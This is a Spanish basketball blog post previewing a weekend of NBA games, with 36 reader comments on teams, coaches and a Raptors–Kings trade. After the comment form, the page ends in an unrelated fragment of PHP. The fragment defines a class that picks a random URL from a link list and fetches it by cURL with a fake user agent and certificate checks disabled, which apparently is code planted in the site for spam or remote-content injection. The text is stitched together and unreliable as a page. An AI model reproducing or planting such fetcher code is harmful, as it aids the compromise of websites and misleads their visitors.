Fin de semana: Bridge again

06 de December de 2013 por TheDeerHunter

Fin de semana y ya sabéis que toca. Nosotros a reflexionar sobre las cuestiones más profundas de la existencia, que si no el día a día no nos da para ello. Estos días tenemos menú light con únicamente 24 partidos.

Comenzamos hoy viernes con una jornada un tanto tranquila. Hay Kobe’s interruptus y está descartado que vuelve esta noche. Destacamos únicamente dos partidos, ambos en el Oeste y ambos a la misma hora (2AM… habrá que dividirse). Los únicos de la jornada entre equipos por encima del 50% en la tabla. Los Warriors tienen una complicada visita a Houston y los Thunder tratarán de aprovechar la baja de Davis en Nueva Orleans.
El resto: (1AM) Sixers@Bobcats, Bucks@Wizards; (1:30) Cavs@Hawks, Nuggets@Celtics, Magic@Knicks; (3AM) Raptors@Suns y (4AM) Lakers@Kings y Jazz@Blazers.

Mañana sábado partidazo marcado en rojo ahora mismo. Los Pacers visitan San Antonio (2:30 AM) y exeptuando un par de choques del fondo de la tabla (Nets@Bucks y Kings@Jazz) el resto tienen su interés. (1AM) Nuggets@Sixers y Clippers@Cavs; (2AM) Pistons@Bulls, Warriors@Grizzlies y Heat@Wolves. (4AM) Mavs@Blazers.

El domingo, que solemos ver baloncesto en horarios asequibles, podremos ver por la tarde el Celtic@Knicks y a las 0AM el Heat@Pistons como revancha del otro día. A la 1AM será un crimen perderse el Pacers@Thunder y también está programado el Magic@Rockets. Además, ojo, se espera el debut de Kobe Bryant ante los Raptors, a las 3:30AM.

Finalmente comentar por encima que los Rockets han puesto oficialmente en el mercado a Asik y que los Heat se están moviendo para reforzar su segunda unidad. En las próximas fechas podría haber sorpresas.

Nada más. A pasarlo bien, chavales.

Comenta

36 comentarios a esta entrada

  1. Simon dice:
    #1

    Vaya por Dios, se levanta uno para ver la segunda parte del Warriors-Rockets y me encuentro con que no hay partido, que los Rockets ganan de 26… Al menos he podido ver los minutos finales del Bucks-Wizards que ahora empiezan la prórroga que tiene toda la pinta que se llevan los Bucks pues a la hora de la verdad Wizards es sólo Wall…
    PD: Ahora si, por fin Kyle Korver ha batido el record de partidos consecutivos con un triple.

      Citar

  2. Simon dice:
    #2

    Madremia, que le pasa a Irving? esta se supone que iba a ser su temporada de despegue y está siendo absolutamente desastrosa… hoy 0 puntos. Algo le tiene que pasar al chaval, todavía no había dado muestras de ser capaz de liderar a un equipo a ser ganador pero de ahí a fallar el también individualmente de la manera que lo está haciendo… muy preocupantes los Cavs.

      Citar

  3. Simon dice:
    #3

    Bueno Wizards 3 abajo y 20 segundos por delante, a ver que hacen vista su innoperancia desde el triple en los minutos finales del último cuarto en el que han fallado hasta 4 triples totalmente solos que hubieran matado el partido…

      Citar

  4. Simon dice:
    #4

    Chapuzon del bueno… Wall choca con su propio compañero en una especie de ¿bloqueo? y pisa la linea… balón perdido y victoria para Bucks…

      Citar

  5. Denise dice:
    #5

    Korver ha batido el record con 2 triples en la paliza a unos Cavs sin identidad con Irving (0 puntos, 0-9 en Tiros de campo y 3 tiros libres fallados), Varejao 1-6 y Bennet 0-3. Sólo se salvan Waiters con 30 puntos y un magnifico 13-20 y otro gran partido de Bynum dominando la zona en 26 minutos con un 20-13

    Lamentable, ridicula, espantosa segunda parte de los Magic en el mitico Madison. Esta imagen tan patetica no se puede dar Sr. Vaughn..NY está cosiendo a triples a los de Florida, llevan 17 por lo que me imagino que andarán cerca de batir un record. Nelson-Oladipo-Afflalo estaban haciendo un señor partido hasta el descanso y no se que ha pasado en los vestuarios pero es lo peor que he visto en mucho tiempo, concentración, defensa y dirección del juego cero, 58-23 para Knicks tras el descanso, a falta de 2 minutos para acabar el partido, y los de la Gran Manzana dandose un festin de 40 puntos de diferencia

      Citar

  6. Denise dice:
    #6

    12-18 en libres para Howard ahora mismo y los Rockets jugando a placer con todo el 5 inicial sentadito en el banquillo descansando. Muy mal los Warrriors, ya lo advertiamos hace un par de semanas, los partidos que ganaban lo hacían de forma heroica y por pocas diferencias, y contra los rivales fuertes, no han tenido ninguna opción en casi ningun partido.

      Citar

  7. Vader dice:
    #7

    Simon:
    Madremia, que le pasa a Irving? esta se supone que iba a ser su temporada de despegue y está siendo absolutamente desastrosa… hoy 0 puntos. Algo le tiene que pasar al chaval, todavía no había dado muestras de ser capaz de liderar a un equipo a ser ganador pero de ahí a fallar el también individualmente de la manera que lo está haciendo… muy preocupantes los Cavs.

    Seguro que algo más le pasará pero lo primero que me viene a la cabeza es: Mike Brown. No entiendo como este señor sigue recibiendo ofertas para entrenar en la NBA…

    P.D: Por cierto Waiters también esta estancando. Talento y Mike Brown nunca han ido de la mano…

    P.D.2: Por fin los Knicks empiezan a jugar como el año pasado, cosiendo a triples y dejando espacio dentro para operar a Melo. Así si que se pueden ganar partidos y por lo menos hacer una temporada digna. Por cierto hasta el momento un 10 para Bargniani.

      Citar

  8. Simon dice:
    #8

    Vader: Seguro que algo más le pasará pero lo primero que me viene a la cabeza es: Mike Brown. No entiendo como este señor sigue recibiendo ofertas para entrenar en la NBA…

    P.D: Por cierto Waiters también esta estancando. Talento y Mike Brown nunca han ido de la mano…

    P.D.2: Por fin los Knicks empiezan a jugar como el año pasado, cosiendo a triples y dejando espacio dentro para operar a Melo. Así si que se pueden ganar partidos y por lo menos hacer una temporada digna. Por cierto hasta el momento un 10 para Bargniani.

    Es una opción si… pero desde que llegó Irving a la liga la verdad es que el esquema de ataque de Cleveland no ha variado mucho… balón a Irving que bota y bota, hace algunos dribling y tira a canasta… en ese aspecto no ha cambiado mucho el tema…

    Por otro lado coincido con el 10 a Bargniani… yo lo consideraba un cacho de carne… y la verdad es que en Knicks está sacando el caracter que nunca sacó en Toronto, lo ves tener enganchones con otros jugadores, pedir el balón en momentos importantes, defender… si incluso lo hemos visto coger mas de 10 rebotes y poner mas de 5 tapones en un partido… Dentro de sus limitaciones que todos conocíamos está rindiendo estupendamente.

      Citar

  9. Denise dice:
    #9

    Las 10 mejores jugadas de la noche. El pincho de Merluza de Oladipo a Carmelo en el #4 me parece el mejor sin discusión, y no lo digo porque sea de Orlando.

      Citar

  10. Denise dice:
    #10

    He aquí el video de Sanders dandose hostias en la discoteca. Que tonto es, sobre el segundo 30, el chaval que está delante suya ha controlado la situación y él pivot se pone a provocar lanzando vasos y otra vez vuelve el lío.

      Citar

  11. rumbero dice:
    #11

    Simon: Es una opción si… pero desde que llegó Irving a la liga la verdad es que el esquema de ataque de Cleveland no ha variado mucho… balón a Irving que bota y bota, hace algunos dribling y tira a canasta… en ese aspecto no ha cambiado mucho el tema…

    A Irving hay que darle porque está horrible, pero no es normal que un tío deje de molar tanto de una temporada para la otra. Yo esta temporada he intentado ver 3 partidos de los Cavs y no he acabado ninguno. Aún no se a que diablos juegan. En defensa donde se supone que debían mejorar con Brown no dejan de ser mediocres y ofensivamente son un esperpento. Es cierto que ya vivían del 1vs1 de Irving o Waiters pero ahora todo es muuuucho más lento y controlado. Kyrie es lo que es y tenerlo con una correa desde el banquillo la mitad del partido a mi me parece absurdo. Parece obvio qLo mismo debe pensar Jack 0 circulación de balón. Ahora que parece que Bynum anda algo mejor meten alguna bola más dentro, pero hasta ahora los interiores vivían de recoger las mandarinas que se tiraban desde fuera. El segundo equipo que menos anota en la pintura. No creo q

      Citar

  12. rumbero dice:
    #12

    (la lié y se cortó)
    Resumiendo, a mi me parece que Irving y algunos más no están nada cómodos con el sistema de juego. Los Cavs deberían ser un equipo divertido y Brown quiere jugar a algo que parece difícil con el roster que tiene. Y luego hay cosas que ya se han comentado por aquí como la gestión del caso Bennett o esos cambios en la rotación que sólo entiende él. Que se traigan a Karl anda

      Citar

  13. rumbero dice:
    #13

    Denise:
    He aquí el video de Sanders dandose hostias en la discoteca. Que tonto es, sobre el segundo 30, el chaval que está delante suya ha controlado la situación y él pivot se pone a provocar lanzando vasos y otra vezvuelve el lío.

    Vaya tela. Lo primero que tira es una botella de champán O_o. Y luego, ¿el tío va montado en unos patines o del pedo que lleva no tiene narices a mantenerse en pie? Que manera de estrenar contrato si señor

      Citar

  14. Heineken dice:
    #14

    A mi Mike Brown me parece una mentira de entrenador, pero es que además no se que pretenden los Cavs juntando a dos pivots de cristal como Bynum y Varejao para además tener al pobre Zeller agitando la toalla. Elegir al numero 1 del draft y tenerlo jugando 15 minutos por partido y sin saber si es un 3 o un 4. Pero es que encima si lo haces jugar de 4 estas perjudicando al que ahora mismo mejor esta jugando, Tristan Thompson.

    Earl Clark que demostró que valía bastante para jugar, en un sube y baja de minutos rotando con CJ Miles y Gee, que un día juegan, otro no, ahora titular, mañana en la grada… Un despropósito de equipo.

      Citar

  15. Esteban dice:
    #15

    lo de los Cavs y Anthony Bennet es como lo de Detriot y Milicic

    si lo que querian eran jugadores que ganaran partidos y no se equivocaran infantilmente, por que no cambiaron la ronda?

    pedir a un rookie, aun no desarrollado pero con algun potencial, que entre juege, gane y no se equivoque es ridiculo

    incluso, OLADIPO que era el rookie mas preparado, pierde 10 bolas por juego

      Citar

  16. Schize dice:
    #16

    ¿Alguien podría explicarme por qué Biedrins juega 13 minutos y Gobert solamente 2?

      Citar

  17. Denise dice:
    #17

    Schize:
    ¿Alguien podría explicarme por qué Biedrins juega 13 minutos y Gobert solamente 2?

    Porque el entrenador de los Jazz es un puto merluzo!!.
    El equipo mormón me cae mal, pero ahora tienen a Burke y a Gobert que son dos jugadores que me encantan y me estan haciendo ver algunos trozos de sus partidos, y el francés va a ser una p.. maquina. El tio está mas verde que una lechuga, pero aun así debe ser uno de los jugadores mas productivos de toda la liga, en los pocos ratos que el merluzo le deja estar en pista, se hincha a coger rebotes, intimidar y hacer rectificar tiros y taponar. Tiene tendencia a cometer muchas faltas cuando lo sacan de la pintura, pero eso en un equipo en construcción como los Jazz debería dar igual. Espero que entre en un trade y se vaya a un equipo donde le den mas confianza y le hagan mejorar porque en condiciones normales, el francés es un All-Star de aqui a 4 años.

    Y ya de paso, quiero decir que Hayward es un hacenumeros del copón, un tio tremendamente sobrevalorado, craso error el que le firme un contrato por mas de 8 kilos, ni tiene un tiro consistente, ni tiene buena finalización en las penetraciones, amasa mucho la bola para despues perderla con facilidad. Y en defensa, las lineas de pase las corta bien, pero en el 1×1 se lo comen con patatas. Y Kanter es un tio que tiene todo el fisico del mundo para triunfar pero me desespera verlo, rebotea como una abuela, no tiene visión de juego alguna, no es inteligente y frecuentemente se tira unas mandarinas que te quedas con cara de poker.

      Citar

  18. Denise dice:
    #18

    Tremendo el triple de Lillard en la cara de Marion, y la contestación de Monta para ganar el partido.
    Gran temporada hasta la fecha la de los Mavs, tenia muchisimas dudas con el equipo, en especial por dentro, sobre el papel, la lista de Centers con Dalembert-Blair-Bernard James podrían ser de las peores del campeonato pero los 3 están cumpliendo bastante bien dentro de sus limitaciones.

      Citar

  19. rumbero dice:
    #19

    Denise:
    Y ya de paso, quiero decir que Hayward es un hacenumeros del copón, un tio tremendamente sobrevalorado, craso error el que le firme un contrato por mas de 8 kilos, ni tiene un tiro consistente, ni tiene buena finalización en las penetraciones, amasa mucho la bola para despues perderla con facilidad. Y en defensa, las lineas de pase las corta bien, pero en el 1×1 se lo comen con patatas. Y Kanter es un tio que tiene todo el fisico del mundo para triunfar pero me desespera verlo, rebotea como una abuela, no tiene visión de juego alguna, no es inteligente y frecuentemente se tira unas mandarinas que te quedas con cara de poker.

    Pues a mi siempre me ha parecido que Hayward le echa muchos cojones y de ahí saca los números. El tema es que esta temporada se ha encontrado con muchos minutos, teniendo que bailar casi siempre con la más fea y a la vez siendo la referencia ofensiva del equipo tanto a nivel de tiros como de generar juego (al menos hasta la llegada de Burke) de un equipo que tiene muy poquita cosa. El cambio ha sido importante y de ahí sus porcentajes en tiro y pérdidas, pero el chaval hace muchas cosas y bastante bien. Salvando las distancias puede ser una versión menor de Iguodala, no es un tío que deba jugarse 20 tiros por partido pero siempre viene bien tenerlo en tu equipo

      Citar

  20. rumbero dice:
    #20

    Denise:
    Y ya de paso, quiero decir que Hayward es un hacenumeros del copón, un tio tremendamente sobrevalorado, craso error el que le firme un contrato por mas de 8 kilos, ni tiene un tiro consistente, ni tiene buena finalización en las penetraciones, amasa mucho la bola para despues perderla con facilidad. Y en defensa, las lineas de pase las corta bien, pero en el 1×1 se lo comen con patatas. Y Kanter es un tio que tiene todo el fisico del mundo para triunfar pero me desespera verlo, rebotea como una abuela, no tiene visión de juego alguna, no es inteligente y frecuentemente se tira unas mandarinas que te quedas con cara de poker.

    Pues a mi siempre me ha parecido que Hayward le echa muchos cojones y de ahí saca los números. El tema es que esta temporada se ha encontrado con muchos minutos, teniendo que bailar casi siempre con la más fea y a la vez siendo la referencia ofensiva del equipo tanto a nivel de tiros como de generar juego (al menos hasta la llegada de Burke) de un equipo que tiene muy poquita cosa. El cambio ha sido importante y de ahí sus porcentajes en tiro y pérdidas, pero el chaval hace muchas cosas y bastante bien. Salvando las distancias puede ser una versión menor de Iguodala, no es un tío que deba jugarse 20 tiros por partido pero siempre viene bien tenerlo en tu equipo

      Citar

  21. rumbero dice:
    #21

    Y a todo esto, que pasote de nivel de juego que tiene ahora mismo los Pacers. Brutal como funciona ese quinteto titularque una vez más ha rebentado el partido en el tercer cuarto. Para verlo porque para que los Spurs parezcan un muñeco roto hay que hacerlo muy muy bien, por mucho que sepamos que Pop en RS dificilmente se salga de la hoja de ruta dando minutos de más a los “buenos”. Y hoy contra Thunder, a ver como acusan el cansancio

      Citar

  22. Denise dice:
    #22

    rumbero: Pues a mi siempre me ha parecido que Hayward le echa muchos cojones y de ahí saca los números. El tema es que esta temporada se ha encontrado con muchos minutos, teniendo que bailar casi siempre con la más fea y a la vez siendo la referencia ofensiva del equipo tanto a nivel de tiros como de generar juego (al menos hasta la llegada de Burke) de un equipo que tiene muy poquita cosa. El cambio ha sido importante y de ahí sus porcentajes en tiro y pérdidas, pero el chaval hace muchas cosas y bastante bien. Salvando las distancias puede ser una versión menor de Iguodala, no es un tío que deba jugarse 20 tiros por partido pero siempre viene bien tenerlo en tu equipo

    Claro que es bueno tenerlo en tu equipo, pero no a cualquier precio. No creo que tenga calidad para ser uno de los 4 tios mas importantes en un equipo contender y hace poco se rumoreó que los Jazz podrían hacerle una extensión de contrato a 49 millones por 4 años, mas de 12 kilos por temporada. Wow, me parecería una magnifica idea de hipotecarte con un salario toxico.
    Iggy me parece 1000 veces mejor, yo lo compararía con Dunleavy pero con peor tiro de tres.

      Citar

  23. Heineken dice:
    #23

    Es que a Hayward le esta tocando hacer de 1º espada de un equipo muerto, y el no sirve para eso.

    Si estoy de acuerdo en que no se que hace el entrenador de Utah no sacando a todos los jóvenes 30 minutos mínimo (solo Favors y Hayward los superan). Porque ver jugar a Marvin Williams, Jefferson o Biedrins es un chiste malo.

      Citar

  24. Chipi dice:
    #24

    rumbero:
    Y a todo esto, que pasote de nivel de juego que tiene ahora mismo los Pacers. Brutal como funciona ese quinteto titularque una vez más ha rebentado el partido en el tercer cuarto. Para verlo porque para que los Spurs parezcan un muñeco roto hay que hacerlo muy muy bien, por mucho que sepamos que Pop en RS dificilmente se salga de la hoja de ruta dando minutos de más a los “buenos”. Y hoy contra Thunder, a ver como acusan el cansancio

    Si esto sigue así habrá que ver cómo se las apañan para meter a George en el primer equipo de la NBA, porque Lebron y Durant son fijos. Pero no meter al de Indiana sería un sacrilegio.

      Citar

  25. franitis dice:
    #25

    Joder, los Celtics dando un baño a los Knicks y yo no puedo verlos porque me pilla trabajando… Por ahora leo en mi móvil último cuarto 106 – 66 para Boston… ¿Alguien lo está viendo?

      Citar

  26. franitis dice:
    #26

    114-73 para Boston, Sulli 21 ptos; Crawford 23…. Boston tiene ahora un récord de 10-12, que en el Este significa estar en PO a día de hoy… Oficio tienen…

      Citar

  27. Simon dice:
    #27

    franitis:
    Joder, los Celtics dando un baño a los Knicks y yo no puedo verlos porque me pilla trabajando… Por ahora leo en mi móvil último cuarto 106 – 66 para Boston… ¿Alguien lo está viendo?

    yo lo he visto… pero me sentía incapaz de hacer ningún comentario sobre el partido… que verguenza… no recuerdo ver un partido tan bochornoso nunca. Después de partidos así tienen que rodar cabezas si o si…

      Citar

  28. Denise dice:
    #28

    franitis:
    Joder, los Celtics dando un baño a los Knicks y yo no puedo verlos porque me pilla trabajando… Por ahora leo en mi móvil último cuarto 106 – 66 para Boston… ¿Alguien lo está viendo?

    He visto un trozo del tercer cuarto pero ya no había partido con los Celtics ganando de 37 en el Madison y lo he quitado. Diferencia abismal en el rebote, los Celtics enchufando triples sin que el backcourt de los Knicks se enteren, y curiosamente, debe ser uno de los mejores partidos de la temporada para Amare

      Citar

  29. Vader dice:
    #29

    Que desastre los Knicks… Después de dos partidos moviendo el balón con velocidad y anotando de 3, con dos victorias por cierto, hoy han empezado a botar el balón sin sentido, intentar driblings sin sentido, etc… Hasta que no ha entrado Prigioni no han jugado un poco bien. En el segundo cuarto parecía que se podían meter en el partido pero ha sido un espejismo.

    No tengo claro si el problema es del entrenador o de algunos jugadores que por mucho que les digan como se tiene que jugar no sepan o no quieran. Aparte del 0/6 de Shumpert y Felton claro… Pero esta claro que el que pagará los platos rotos será Woodson.

      Citar

  30. rumbero dice:
    #30

    franitis:
    114-73 para Boston, Sulli 21 ptos; Crawford 23…. Boston tiene ahora un récord de 10-12, que en el Este significa estar en PO a día de hoy… Oficio tienen…

    Sin Rondo, líderes de la Atlantic y consiguiendo la mayor victoria de los Celtics en el Madison (que es la tercera peor derrota en casa en la historia de los Knicks). Eso os lo cuentan a principio de temporada y ni los verdes más optimistas os lo creeis xD

      Citar

  31. Ruxixón dice:
    #31

    Y Stevens doctorándose como entrenador de primer nivel,todo sea dicho,que hablamos mal de unos cuantos pero de vez en cuando hay que destacar a los que lo hacen bien.

      Citar

  32. rumbero dice:
    #32

    Vader:
    No tengo claro si el problema es del entrenador o de algunos jugadores que por mucho que les digan como se tiene que jugar no sepan o no quieran. Aparte del 0/6 de Shumpert y Felton claro… Pero esta claro que el que pagará los platos rotos será Woodson.

    Yo creo que hoy los jugadores han quedado muy retratados. Se la cargará Woodson porque es lo que toca y tiene su parte de culpa en todo esto, pero los Knicks no pueden jugar así.

      Citar

  33. Simon dice:
    #33

    Supongo que a todos os pasará lo mismo porque lo hemos comentado una y mil veces… pero no se que pinta Josh Smith en Detroit Pistons. Jugando de 3 y tirando tanto de lejos se convierte en un jugador del montón estilo Kidd Gilrichst, Aminu o gente de ese pelaje. No lo entiendo, podría jugar minutos de tres pero con un esquema y estilo totalmente distinto, así no.

      Citar

  34. Heineken dice:
    #34

    Traspaso entre Raptors y Kings.

    Rudy Gay a cambio de Greivis Vasquez, Chuck Hayes, Pattrick Patterson y John Salmons.

      Citar

  35. Simon dice:
    #35

    Heineken:
    Traspaso entre Raptors y Kings.

    Rudy Gaya cambio de Greivis Vasquez, Chuck Hayes, Pattrick Patterson y John Salmons.

    Justo venía a comentar eso.
    Yo creo que es una nueva jugada maestra de Masai Ujiri.
    Toronto se libra de Rudy Gay y a cambio consigue un par de jóvenes que pueden servir mucho en el futuro. Un veterano como Hayes. Y un expiring como es John Salmons. Hacen espacio para Terrence Ross ( para mi un acierto ) y… ¿para Wiggins?

    Para Sacramento no me gusta tanto el traspaso… Con Rudy Gay van a ser todavía más casa de putas, además no se han librado de Thorthon. Sólo pensar en Thomas, Thorthon, Gay, Williams y Cousins… van a necesitar 5 balones para poder jugar… Madremia…

      Citar

  36. franitis dice:
    #36

    Vuelve Kobe como titular y asistiendo para la primera canasta de LAL…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>